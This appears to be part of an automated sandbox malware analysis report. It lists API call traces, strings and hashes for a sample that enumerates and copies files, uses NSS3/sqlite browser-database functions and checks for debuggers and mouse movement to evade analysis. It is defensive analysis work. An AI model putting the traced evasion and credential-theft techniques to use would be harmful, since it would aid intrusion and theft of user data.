                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00957438), ref: 0092B9AB
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00931C1F: GetSystemTime.KERNEL32(?,009566E2,?), ref: 00931C4E
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 0092BDE0
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0092E72B,?,?,?), ref: 00927FC7
                                                                                                                                                                                                                • Part of subcall function 00927FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FDE
                                                                                                                                                                                                                • Part of subcall function 00927FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FF5
                                                                                                                                                                                                                • Part of subcall function 00927FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0092E72B,?,?,?), ref: 0092800C
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CloseHandle.KERNEL32(?,?,?,?,?,0092E72B,?,?,?), ref: 00928034
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0092BE57
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00937023: CreateThread.KERNEL32(00000000,00000000,00936F52,?,00000000,00000000), ref: 009370C2
                                                                                                                                                                                                                • Part of subcall function 00937023: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 009370CA
                                                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 0092BEC6
                                                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 0092BEDA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$lstrcpy$Find$CloseCreatelstrcat$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                                                              • API String ID: 2055012574-1173974218
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000002,?,6CB7CF46,?,6CA4CDBD,?,6CB7BF31,?,?,?,?,?,?,?), ref: 6CA5B039
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CB7CF46,?,6CA4CDBD,?,6CB7BF31), ref: 6CA5B090
                                                                                                                                                                                                              • sqlite3_free.NSS3(?,?,?,?,?,?,6CB7CF46,?,6CA4CDBD,?,6CB7BF31), ref: 6CA5B0A2
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,6CB7CF46,?,6CA4CDBD,?,6CB7BF31,?,?,?,?,?,?,?,?,?), ref: 6CA5B100
                                                                                                                                                                                                              • sqlite3_free.NSS3(?,?,00000002,?,6CB7CF46,?,6CA4CDBD,?,6CB7BF31,?,?,?,?,?,?,?), ref: 6CA5B115
                                                                                                                                                                                                              • sqlite3_free.NSS3(?,?,?,?,?,?,6CB7CF46,?,6CA4CDBD,?,6CB7BF31), ref: 6CA5B12D
                                                                                                                                                                                                                • Part of subcall function 6CA49EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6CA5C6FD,?,?,?,?,6CAAF965,00000000), ref: 6CA49F0E
                                                                                                                                                                                                                • Part of subcall function 6CA49EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CAAF965,00000000), ref: 6CA49F5D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3155957115-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6CB2BD48
                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6CB2BD68
                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6CB2BD83
                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6CB2BD9E
                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6CB2BDB9
                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6CB2BDD0
                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6CB2BDEA
                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6CB2BE04
                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6CB2BE1E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AlgorithmPolicy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2721248240-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_CallOnce.NSS3(6CC214E4,6CB8CC70), ref: 6CBD8D47
                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6CBD8D98
                                                                                                                                                                                                                • Part of subcall function 6CAB0F00: PR_GetPageSize.NSS3(6CAB0936,FFFFE8AE,?,6CA416B7,00000000,?,6CAB0936,00000000,?,6CA4204A), ref: 6CAB0F1B
                                                                                                                                                                                                                • Part of subcall function 6CAB0F00: PR_NewLogModule.NSS3(clock,6CAB0936,FFFFE8AE,?,6CA416B7,00000000,?,6CAB0936,00000000,?,6CA4204A), ref: 6CAB0F25
                                                                                                                                                                                                              • PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6CBD8E7B
                                                                                                                                                                                                              • htons.WSOCK32(?), ref: 6CBD8EDB
                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6CBD8F99
                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6CBD910A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
                                                                                                                                                                                                              • String ID: %u.%u.%u.%u
                                                                                                                                                                                                              • API String ID: 1845059423-1542503432
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenInputDesktop.USER32(00000000,00000001,80000000), ref: 00921823
                                                                                                                                                                                                              • SetThreadDesktop.USER32(00000000), ref: 0092182A
                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 0092183A
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0092184A
                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 00921859
                                                                                                                                                                                                              • Sleep.KERNEL32(00002710), ref: 0092186B
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 00921870
                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 0092187F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CursorSleep$Desktop$InputOpenThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3283940658-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memcmp.VCRUNTIME140(?,00000000,6CA4C52B), ref: 6CB79D53
                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014960,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB7A035
                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000149AD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB7A114
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_log$memcmp
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                              • API String ID: 717804543-598938438
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6CA58637,?,?), ref: 6CB99E88
                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6CA58637), ref: 6CB99ED6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • database corruption, xrefs: 6CB99ECA
                                                                                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB99EC0
                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6CB99ECF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _byteswap_ulongsqlite3_log
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                              • API String ID: 912837312-598938438
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0094B8C5,?,00948676,?,000000BC,?), ref: 0094B29B
                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0094B8C5,?,00948676,?,000000BC,?), ref: 0094B2C4
                                                                                                                                                                                                              • GetACP.KERNEL32(?,?,0094B8C5,?,00948676,?,000000BC,?), ref: 0094B2D8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                                              • API String ID: 2299586839-711371036
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 0093D5E0
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0093D5F5
                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(0095332C), ref: 0093D600
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 0093D61C
                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 0093D623
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2579439406-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CBDD086
                                                                                                                                                                                                              • PR_Malloc.NSS3(00000001), ref: 6CBDD0B9
                                                                                                                                                                                                              • PR_Free.NSS3(?), ref: 6CBDD138
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeMallocstrlen
                                                                                                                                                                                                              • String ID: >
                                                                                                                                                                                                              • API String ID: 1782319670-325317158
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,00B7E708,?,?,?,009328E1,?,?,00000000), ref: 00931E52
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?,009328E1,?,?,00000000), ref: 00931E5F
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,009328E1,?,?,00000000), ref: 00931E66
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocBinaryCryptProcessString
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1871034439-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(00926724,00000000,00000001,00000000,?,00000000,00000000), ref: 00928060
                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,?,?,00926724,?), ref: 0092806E
                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(00926724,00000000,00000001,00000000,?,00000000,00000000), ref: 00928084
                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,00926724,?), ref: 00928093
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4291131564-0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: sqlite_$sqlite_master$sqlite_temp_master
                                                                                                                                                                                                              • API String ID: 0-4221611869
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: htonl
                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                              • API String ID: 2009864989-4108050209
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 0092146D
                                                                                                                                                                                                              • NtQueryInformationProcess.NTDLL(00000000), ref: 00921474
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$CurrentInformationQuery
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3953534283-0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: winUnlock$winUnlockReadLock
                                                                                                                                                                                                              • API String ID: 0-3432436631
                                                                                                                                                                                                              • Opcode ID: 8106f3854d6a8382b86f5730c8e840c166658d20ea9818609c2d49e9016e3019
                                                                                                                                                                                                              • Instruction ID: 27156d07dd292cc2c0a26e02c749d88a15d3e80bc2600df2814e6e7e64258aa3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8106f3854d6a8382b86f5730c8e840c166658d20ea9818609c2d49e9016e3019
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 067179716083449BDB04CF29D895AAABBF5FF89314F14C61CF94997A01DB30E9C68BD1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6CB1EE3D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Alloc_ArenaUtil
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2062749931-0
                                                                                                                                                                                                              • Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
                                                                                                                                                                                                              • Instruction ID: 93b058c825aebde3ee9267f535e85c8b74a792193d74d051e95f0181cfbd8e60
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED71D272E097858FEB18CF59C8846AEB7F2EB98304F15462DD85A97F91D730E900CB91
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: winUnlockReadLock
                                                                                                                                                                                                              • API String ID: 0-4244601998
                                                                                                                                                                                                              • Opcode ID: f158511ca39a4d62ff5ea368e0ba90f97c03d13c66adb62a886f3b2e238f5a37
                                                                                                                                                                                                              • Instruction ID: 7a1e8b0c474e77504bee4345742ae96c571c9fcee02ddf82bafc04d2f62c51e9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f158511ca39a4d62ff5ea368e0ba90f97c03d13c66adb62a886f3b2e238f5a37
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1E12A70A183408FDB04DF29D489A5ABBF0BF89308F55961DF88997651EB30D9D5CF82
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnumSystemLocalesA.KERNEL32(Function_0002B351,00000001), ref: 0094B6FF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EnumLocalesSystem
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2099609381-0
                                                                                                                                                                                                              • Opcode ID: cb3619fdb4fefbc5ad047955e2a878a7b49d6930f0d3bfa50c1d02aebd8a9e99
                                                                                                                                                                                                              • Instruction ID: dcc6989bfc11c72afd39ef5b0bafc96443c3d13066791c47b7255d06210d9292
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb3619fdb4fefbc5ad047955e2a878a7b49d6930f0d3bfa50c1d02aebd8a9e99
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15D05E71915B005BD7204F329949BA177A0EB90B1AF249849DC96494C0D7B4A5858601
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0002777C), ref: 009477C3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                              • Opcode ID: 7c50f6de93af7aa19238741de09862f828f0c8c28d8c0ce1c736828713a7c732
                                                                                                                                                                                                              • Instruction ID: a7ead55452ba38287475ec90120709c23ebf3d5464be7323a5293e59fe7e45ee
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c50f6de93af7aa19238741de09862f828f0c8c28d8c0ce1c736828713a7c732
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 549002702AD7445A460117B16C0D80569D46ACC70BB810450A041C4054DB9050046652
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 22312dd7076624c71bde8b92e2a11d5b95e289a32f89c729d9f8e76f35fb007d
                                                                                                                                                                                                              • Instruction ID: 78cc54668e0ed93e0936dafe8d627fd6508533af37f9fe9bd5d92b124107c7ce
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 22312dd7076624c71bde8b92e2a11d5b95e289a32f89c729d9f8e76f35fb007d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0802D433D4A6B24B8F764EB944D0A2B7FA46E01B4431F47E9DDD03F196C216ED0A96E0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
